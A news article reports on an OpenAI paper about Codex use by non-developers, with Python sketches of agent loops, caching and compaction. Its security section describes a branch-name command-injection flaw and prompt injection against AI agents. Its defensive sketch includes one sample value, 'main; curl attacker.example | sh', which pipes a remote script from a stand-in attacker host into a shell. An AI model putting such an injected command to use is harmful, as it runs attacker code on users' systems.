OpenAI Codex Data Shows Non-Developers Now Driving Enterprise AI Agent Surge
Source: TechTimes

OpenAI published economic research on Thursday documenting what may be the fastest large-scale shift in professional tool usage on record: weekly non-developer users of its agentic AI platform Codex on enterprise accounts grew 189-fold from an August 2025 baseline, outpacing the rate at which software engineers first took it up. The findings, set out in a paper titled The Shift to Agentic AI: Evidence from Codex, replace months of speculation about whether agentic AI would travel beyond technical teams with hard usage data showing it already has: inside organizations, inside law firms, inside finance departments, and inside OpenAI itself.

The paper, authored by researchers from OpenAI, Columbia Business School, the Wharton School, and Duke University, analyzed usage across three populations: individual platform subscribers, organizational (enterprise) account holders, and OpenAI's own workforce. The dataset runs through June 11, 2026, and the scale it documents is large enough that the authors treat it as a signal about the broader trajectory of AI in the workplace, not just a product metric.

What Separates an AI Agent from a Chatbot

The central technical distinction in the paper is worth stating precisely, because the rest of the findings depend on it. A chatbot interaction is a single, self-contained exchange: a user submits a question or instruction and receives a response. An agentic AI system runs a different kind of loop. When a user delegates a task to Codex, the system does not generate a single reply. It enters a cycle: it reasons about what needs to happen, invokes an external tool — reading a file, executing code, running a test, querying a repository — receives the result, updates its understanding, and decides what to do next. That cycle repeats, without human intervention, until the task is complete or the agent determines it has reached a limit.
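The cycle described above can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not Codex's implementation: `Step`, `run_agent`, `scripted_policy`, and the two toy tools are hypothetical names, and the scripted policy stands in for the model's reasoning.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass
class Step:
    """One decision by the policy: call a tool, or finish with an answer."""
    tool: Optional[str] = None
    argument: str = ""
    answer: str = ""


def run_agent(goal: str,
              policy: Callable[[List[str]], Step],
              tools: Dict[str, Callable[[str], str]],
              max_steps: int = 10) -> Tuple[str, List[str]]:
    """Repeat reason -> call tool -> observe until done or the step limit is hit."""
    history = [f"goal: {goal}"]
    for _ in range(max_steps):
        step = policy(history)                    # reason about what to do next
        if step.tool is None:                     # the policy judged the task complete
            return step.answer, history
        result = tools[step.tool](step.argument)  # invoke the external tool
        # Record the observation so the next decision can take it into account.
        history.append(f"{step.tool}({step.argument!r}) -> {result}")
    return "stopped: step limit reached", history


def scripted_policy(history: List[str]) -> Step:
    """Toy stand-in for the model: read a file, run the tests, then finish."""
    if len(history) == 1:
        return Step(tool="read_file", argument="notes.txt")
    if len(history) == 2:
        return Step(tool="run_tests")
    return Step(answer="done after 2 tool calls")


# Hypothetical tools that return canned strings instead of touching a real system.
TOOLS = {
    "read_file": lambda path: f"contents of {path}",
    "run_tests": lambda _arg: "3 passed",
}

answer, history = run_agent("fix the failing test", scripted_policy, TOOLS)
```

A chatbot exchange corresponds to a policy that returns an answer on its first call; the agentic case is the one where the loop runs several tool calls before finishing or hitting `max_steps`.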

OpenAI measured this distinction directly: in the week before June 11, 2026, 60.3% of Codex sessions invoked at least one external tool, compared to 21.9% of ChatGPT sessions. That gap is the operational definition of agentic versus conversational. It also explains why token counts — the standard measure of AI usage — dramatically understate what Codex is doing relative to ChatGPT. A user who submits a Codex task estimated to require eight hours of human work is not generating more words. They are delegating more decision-making.

The paper documents how task complexity has changed as the platform matured. In December 2025, 35.4% of sampled individual users submitted at least one task that would take an experienced human at least an hour to complete without AI assistance. By May 2026, that figure had risen to 70.2%. The share of users submitting eight-hour-equivalent tasks grew nearly tenfold over the same period. By June 2026, the top 1% of daily active OpenAI employees were generating more than 60 hours of combined Codex agent runtime per day — not sequentially, but spread across multiple parallel agents running simultaneously.
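A quick calculation shows why 60 hours of agent runtime in a day implies parallel work. The sketch below assumes the figure applies per person per calendar day, which the reporting does not state outright, and the 8-hour working day is an illustrative assumption rather than a number from the paper.

```python
def average_concurrency(agent_runtime_hours: float, wall_clock_hours: float) -> float:
    """Average number of agents that must run at once to fit the runtime into the window."""
    if wall_clock_hours <= 0:
        raise ValueError("wall_clock_hours must be positive")
    return agent_runtime_hours / wall_clock_hours


# 60 agent-hours spread over a full 24-hour day.
full_day = average_concurrency(60, 24)

# The same 60 agent-hours squeezed into an assumed 8-hour working day.
working_day = average_concurrency(60, 8)
```

Under these assumptions the average works out to 2.5 agents running around the clock, or 7.5 agents if all the runtime falls inside an 8-hour window.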

More than 10% of users managed three or more concurrent Codex agents in a given week, and 26.6% used Skills — reusable instruction packages that let a user encode a recurring workflow once and invoke it on demand, without re-explaining it each time.

AI Agents Replace Chatbots at OpenAI Across Every Department

The internal OpenAI data is the most complete picture in the paper, because the company operates with no usage restrictions and substantial internal knowledge sharing about AI capabilities — making it, as the authors note, an outlier that provides a view of what adoption might look like when friction is minimized.

For the first several months after Codex launched publicly in April 2025, ChatGPT remained the default AI tool inside OpenAI. Engineers began drifting toward Codex first. By December 2025, the average engineer was generating the majority of AI output tokens through Codex rather than ChatGPT. That engineer figure is now 99%.

What followed was a faster transition in the departments that came later. Legal, Finance, and Recruiting reached 50% Codex usage by April 2026 — a crossover that took engineers several months to reach but that non-technical departments cleared in a matter of weeks. The average lawyer or recruiter at OpenAI now generates more than 85% of their output through Codex. At the company level, Codex accounts for 99.8% of all weekly AI output tokens generated by OpenAI employees across Codex and ChatGPT combined.

The intensity of use also accelerated sharply. Between November 2025 and June 2026, median monthly token output among active internal users rose 56-fold in the Research department, 32-fold in Customer Support, and 27-fold in Engineering. Legal saw a 13-fold increase over the same period.

Non-Developers Are the Fastest-Growing Segment Outside OpenAI

The internal pattern has a direct external counterpart. When Codex launched in April 2025, it was explicitly a developer tool, designed to write, review, and debug code. Its early external user base reflected that: primarily software engineers and technical individual contributors.

That distribution has shifted sharply. Among individual platform subscribers, weekly non-developer users multiplied 137 times between August 2025 and early June 2026. Among enterprise organizational subscribers, the figure was 189-fold. The researchers attribute the acceleration to two reinforcing factors: Codex's expanding capability set moved it beyond pure coding toward general knowledge work tasks, and non-developers, once they encountered a tool that required no programming knowledge to use, proved more willing to delegate entirely than engineers, who often prefer iterative control.

A heat-map comparison in the paper illustrates the resulting task mix. Engineers use Codex primarily for engineering and coding work (72% of their output). Finance and business operations workers skew toward financial analysis and general knowledge work. Marketing and operations teams are majority knowledge-work users. But one finding cuts across every non-technical group: more than one-quarter of the work done by business-function employees involved engineering or coding tasks — work those employees would previously have needed technical assistance to complete.

Why Enterprise Adoption Is Moving Faster Than Most Organizations Expect

The Rogers diffusion model — the classic S-curve framework for how technologies spread through organizations — has historically suggested that transformative tools take several years to move from early technical adopters to broad institutional use. The OpenAI data suggests the S-curve for enterprise agentic AI is compressing dramatically. Inside OpenAI, the shift from developer-first to company-wide majority adoption took approximately eight months. The external enterprise data, while less complete, points in the same direction.

The paper's authors, who include economists from Columbia and Wharton, frame the implications across three audiences. For businesses, the finding is that capable, low-friction agentic tools — once available — expand rapidly and move well beyond technical pilots. The organizational challenge is not getting engineers to use an AI agent; it is redesigning workflows, approval processes, and skill requirements around a system where workers delegate, monitor, review, and coordinate multiple autonomous streams of work rather than executing tasks themselves.

For employees, the question the data raises is which skills become more valuable as agents handle larger portions of execution. The paper is not a displacement study, but parallel research from Microsoft's 2026 Work Trend Index, which surveyed 20,000 knowledge workers across ten countries, found that the skills workers identified as most important in an agentic AI environment were quality control of AI output and critical thinking. MIT economist Daron Acemoglu has cautioned that this transition phase tends to favor workers with the skills to supervise and coordinate delegated work, with the risk of widening gaps if workforce retraining does not keep pace.

For policymakers and labor economists, the paper provides the first large-scale empirical record of how agentic AI diffuses through a real organization — not a pilot or a controlled experiment, but a full organizational deployment tracked over more than a year.

How OpenAI Codex Handles a Full Day of Work

The paper's descriptions of power-user behavior are among its most technically revealing. The top 1% of daily active OpenAI employees are not submitting more requests — they are running more parallel agents. Rather than working through a single task at a time, they orchestrate multiple Codex agents simultaneously, each operating on a different workstream. The human role shifts from executor to coordinator: defining tasks, reviewing outputs, and redirecting agents rather than doing the work directly.
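The coordinator pattern can be illustrated with Python's standard `asyncio` library. This is a sketch only: `run_agent_task` and `coordinate` are hypothetical names, and `asyncio.sleep` stands in for an agent working on its own workstream; nothing here reflects how Codex schedules agents.

```python
import asyncio
from typing import List, Tuple


async def run_agent_task(name: str, seconds: float) -> str:
    """Stand-in for one agent working independently on a workstream."""
    await asyncio.sleep(seconds)  # placeholder for the agent's actual work
    return f"{name}: ready for review"


async def coordinate(tasks: List[Tuple[str, float]]) -> List[str]:
    """Start every agent at once and collect the outputs for human review."""
    # gather runs the coroutines concurrently and returns results in input order.
    return await asyncio.gather(*(run_agent_task(n, s) for n, s in tasks))


results = asyncio.run(coordinate([
    ("refactor", 0.02),
    ("quarterly report", 0.01),
    ("test suite", 0.03),
]))
```

The three tasks overlap, so the total wait is roughly the longest single task rather than the sum of all three, which is what makes the coordinator role more productive than working through the tasks one at a time.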

The mechanism that makes this economically viable at scale is prompt caching, described in detail in OpenAI's engineering documentation on the Codex agent loop. Every Codex task appends fresh instructions to an existing conversation that acts as the agent's running context. Because new content is always added at the end, the earlier content is always an exact prefix of what the model has already processed, a structural property that allows OpenAI's inference infrastructure to reuse prior computation rather than recalculating it. Because each request resends the whole conversation, the raw data sent to the API grows quadratically as a session extends; without caching, the model computation would grow the same way, and with it, the computation stays closer to linear.
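The quadratic-versus-linear contrast can be checked with a simplified token count. The sketch below is an assumption-laden model, not OpenAI's implementation: it counts only prompt tokens that have to be processed fresh on each turn, ignores generation and any remaining cost of attending over cached tokens, and uses the hypothetical helper names `shared_prefix_len` and `tokens_to_process`.

```python
from typing import List, Sequence


def shared_prefix_len(cached: Sequence[str], prompt: Sequence[str]) -> int:
    """Length of the leading run of tokens the new prompt shares with the cached one."""
    n = 0
    for old, new in zip(cached, prompt):
        if old != new:
            break
        n += 1
    return n


def tokens_to_process(turn_sizes: List[int], use_prefix_cache: bool) -> int:
    """Total prompt tokens processed across a session in which each turn appends new tokens."""
    context = 0
    processed = 0
    for new_tokens in turn_sizes:
        context += new_tokens
        # With a prefix cache only the appended tokens are new work;
        # without one, the whole context is reprocessed on every turn.
        processed += new_tokens if use_prefix_cache else context
    return processed


turns = [1000] * 20  # 20 turns, each appending 1,000 tokens (illustrative numbers)
without_cache = tokens_to_process(turns, use_prefix_cache=False)
with_cache = tokens_to_process(turns, use_prefix_cache=True)
```

For these illustrative numbers the uncached total is 210,000 tokens against 20,000 with the cache. The append-only rule matters because a cache of this kind can only reuse the shared prefix: editing an earlier message shortens that prefix and forces everything after it to be recomputed.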

A related mechanism governs what happens when tasks grow long enough to hit the model's context window. Codex compacts: it replaces the full conversation history with a compressed summary that preserves the key decisions, outputs, and state the agent needs to continue, while discarding the raw exchange that produced them. Without this, long-horizon tasks — the kind that would take a human a full workday — would hit a hard ceiling and fail.
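Compaction can be sketched as a simple budget check. The version below is a minimal illustration under stated assumptions: word counts stand in for real token counts, `placeholder_summary` stands in for a model-written summary, and all function names are hypothetical rather than taken from Codex.

```python
from typing import Callable, List


def count_tokens(messages: List[str]) -> int:
    """Crude token estimate: whitespace-separated words (an assumption, not a real tokenizer)."""
    return sum(len(m.split()) for m in messages)


def maybe_compact(history: List[str],
                  budget: int,
                  summarize: Callable[[List[str]], str]) -> List[str]:
    """Return the history unchanged if it fits the budget, else a single summary message."""
    if count_tokens(history) <= budget:
        return history
    return [summarize(history)]


def placeholder_summary(messages: List[str]) -> str:
    """Stand-in for a model-generated summary of key decisions, outputs, and state."""
    return f"summary of {len(messages)} earlier messages"


# Five messages of ten words each, 50 words in total.
history = [f"message {i} " + "word " * 8 for i in range(5)]

compacted = maybe_compact(history, budget=30, summarize=placeholder_summary)
untouched = maybe_compact(history, budget=100, summarize=placeholder_summary)
```

The trade-off is that whatever the summary omits is gone for the rest of the task, so the quality of the summarizer determines how well a long-running agent remembers its earlier work.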

Security Considerations for Enterprise Deployments

The expanded scope of Codex — a tool that executes code, reads files, calls external tools, and operates in parallel across multiple simultaneous sessions — introduces an attack surface that security teams should account for before enterprise deployment.

In December 2025, security researchers at BeyondTrust's Phantom Labs discovered that Codex passed GitHub branch names directly into shell commands without sanitization. An attacker who could control a branch name could inject arbitrary commands, retrieve a victim's GitHub authentication token in cleartext, and gain read/write access to an entire codebase. SecurityWeek reported that OpenAI patched the vulnerability on February 5, 2026, and there is no evidence it was exploited before disclosure. A separate campaign documented in early 2026 involved a malicious npm package masquerading as a Codex UI tool that drew approximately 29,000 downloads before the payload was identified.
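The general class of bug, untrusted text interpolated into a shell command, has a well-known mitigation pattern. The sketch below is not OpenAI's fix and does not reproduce the vulnerable code: `is_safe_branch_name`, `checkout_argv`, and the allowlist pattern are illustrative assumptions, and the pattern is deliberately stricter than Git's own branch-naming rules.

```python
import re
import subprocess
from typing import List

# Conservative allowlist: letters, digits, dot, underscore, slash, hyphen.
SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/-]+")


def is_safe_branch_name(name: str) -> bool:
    """Reject shell metacharacters, whitespace, and names that look like options."""
    return bool(SAFE_BRANCH.fullmatch(name)) and not name.startswith("-")


def checkout_argv(branch: str) -> List[str]:
    """Build an argument list so the branch is never parsed by a shell."""
    if not is_safe_branch_name(branch):
        raise ValueError(f"refusing unsafe branch name: {branch!r}")
    return ["git", "checkout", branch]


def run_checkout(branch: str) -> None:
    """Run git with an argument list; shell=True is deliberately not used."""
    subprocess.run(checkout_argv(branch), check=True)


# The unsafe pattern: a shell would treat ';' as a command separator here.
hostile = "main; curl attacker.example | sh"
unsafe_command = f"git checkout {hostile}"
```

Two defenses are layered here: validation rejects names containing shell metacharacters or a leading hyphen, and passing a list to `subprocess.run` means that even a name that slipped through would reach `git` as a single argument rather than being interpreted by a shell.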

Security researchers have identified prompt injection — where instructions hidden in content the agent reads can redirect its behavior — as the defining risk class for agentic systems. The Open Worldwide Application Security Project has listed it as its top large language model risk for three consecutive years. Enterprise deployments of Codex should apply the same least-privilege and behavioral monitoring disciplines to AI agents that they apply to human identities with elevated access, which most organizations have not yet done, according to IDC analysis published in June 2026.
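One way to picture least privilege plus monitoring for an agent is a per-agent tool allowlist with an audit trail. The sketch below is a hypothetical illustration, not a Codex feature or API: `AgentPolicy`, `authorize`, and the tool names are invented for the example.

```python
from dataclasses import dataclass
from typing import FrozenSet, List, Tuple


@dataclass(frozen=True)
class AgentPolicy:
    """The only tools this agent identity is permitted to call."""
    allowed_tools: FrozenSet[str]


def authorize(policy: AgentPolicy, tool: str, audit_log: List[Tuple[str, str]]) -> bool:
    """Allow a tool call only if it is on the allowlist, and record every decision."""
    allowed = tool in policy.allowed_tools
    audit_log.append((tool, "allowed" if allowed else "denied"))
    return allowed


# A hypothetical agent limited to reading files and running tests.
policy = AgentPolicy(allowed_tools=frozenset({"read_file", "run_tests"}))
audit_log: List[Tuple[str, str]] = []

can_read = authorize(policy, "read_file", audit_log)
can_email = authorize(policy, "send_email", audit_log)
```

If injected instructions persuade the agent to attempt `send_email`, the call is denied because it was never granted, and the denied attempt in the audit log gives monitoring something concrete to alert on.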


Frequently Asked Questions

What does the 189-fold growth figure for non-developers mean?

The 189-fold figure measures how the number of weekly non-developer users on enterprise accounts grew between August 2025 and early June 2026, compared to the starting count. It does not mean non-developer users now outnumber developer users — developers remain the largest single group. It means the rate of new adoption among non-technical workers has been dramatically faster than among engineers, reversing the expected pattern for a tool that started as a developer product. The implication is that once a capable agentic AI tool is available with no programming requirement, non-technical workers adopt it more aggressively than the technical workers it was originally designed for.
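The difference between fold growth and share of users is easy to see with numbers. Every count below is hypothetical, chosen only to reproduce a 189-fold increase; the reporting gives the multiple, not the underlying user counts.

```python
def fold_growth(start_count: int, end_count: int) -> float:
    """How many times larger the end count is than the starting count."""
    return end_count / start_count


# Hypothetical weekly user counts, for illustration only.
non_dev_start, non_dev_end = 100, 18_900
dev_start, dev_end = 50_000, 150_000

non_dev_fold = fold_growth(non_dev_start, non_dev_end)
dev_fold = fold_growth(dev_start, dev_end)

# Share of all weekly users who are non-developers at the end of the period.
non_dev_share = non_dev_end / (non_dev_end + dev_end)
```

In this made-up scenario non-developers grow 189-fold while developers grow only 3-fold, yet non-developers still make up about 11% of weekly users, because they started from a far smaller base.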

How is agentic AI different from standard AI chatbots?

A chatbot handles one request at a time: a user submits a question, the AI generates a response, and the session ends. An agentic AI system runs an autonomous loop: it receives a goal, determines what steps are required, calls external tools to execute those steps, evaluates the results, and continues iterating — without prompting from the user — until the task is complete. The operational difference is that users of agentic AI are delegating work, not asking questions. OpenAI's paper measures this: 60.3% of Codex sessions invoked at least one external tool, compared to 21.9% for ChatGPT sessions, in the same measurement week.

What jobs or roles are most affected as AI agents take on knowledge work tasks?

The OpenAI paper is not a displacement study and does not address this directly. Parallel research into AI's labor market effects has found that job postings in roles most exposed to AI automation declined 17% while augmentation-friendly roles (those requiring judgment, supervision of AI output, and human-AI collaboration) grew 22%. MIT economist Daron Acemoglu has cautioned that this phase of adoption tends to favor workers with existing expertise to guide and evaluate delegated AI work, and may widen skill gaps if workforce retraining does not keep pace.

What should enterprise decision-makers do with the OpenAI research findings?

The paper's most direct implication for enterprise planning is timeline compression. Historical technology adoption research suggests that transformative tools take several years to move from early technical adopters to broad institutional use. The OpenAI data shows that transition happening in months inside an AI-native organization, and the external enterprise growth figures point in the same direction. Organizations treating agentic AI as a future planning item may be making that decision after the steep part of the adoption curve has already begun. The authors recommend that businesses focus not on whether to deploy agentic tools but on how to redesign workflows, approval processes, and skill development around a model where employees direct and review AI work rather than execute tasks themselves.